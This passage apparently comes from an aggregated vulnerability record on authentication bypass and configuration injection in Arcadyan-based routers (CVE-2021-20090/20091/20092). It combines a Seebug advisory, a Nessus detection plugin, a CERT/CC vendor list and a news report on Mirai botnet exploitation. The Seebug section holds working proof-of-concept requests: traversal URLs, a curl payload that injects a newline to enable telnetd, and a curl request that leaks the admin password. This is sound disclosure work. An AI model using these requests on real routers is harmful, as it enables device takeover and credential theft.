Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox 904 | 4.16 |\n| Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists because requests for certain folders fall under a \"bypass list\" for authentication, and a URL-encoded traversal sequence (..%2f) placed after one of those folders is not rejected, so a request that starts in a bypassed folder can reach a protected file. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a CSRF token (named httoken on these devices) and a valid Referer header, which will cause an error if the Referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. 
An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update 
and mitigation information from their respective vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "seebug", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-08-11T00:00:00", "id": "SSV:99329", "href": "https://www.seebug.org/vuldb/ssvid-99329", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-26T14:27:33", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. 
An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-04-25T00:00:00", "cpe": ["x-cpe:/a:buffalo:buffalo"], "id": "BUFFALO_WSR_CVE_2021_20090.NASL", "href": "https://www.tenable.com/plugins/nessus/152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. 
An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2023-05-27T15:38:11", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://vulners.com/cve/CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. 
The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan-based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable remote (WAN-side) administration services, including the web interface on the WAN, on any SoHo router. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not 
Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. 
Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * SIR-2021-353 and PR 1613180 were created for this issue.\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 
2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. 
Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. 
Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. 
Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 
**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. 
Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://vulners.com/cve/CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-10-07T20:26:00", "id": "VU:914124", "href": "https://www.kb.cert.org/vuls/id/914124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, 
which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021-20090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * 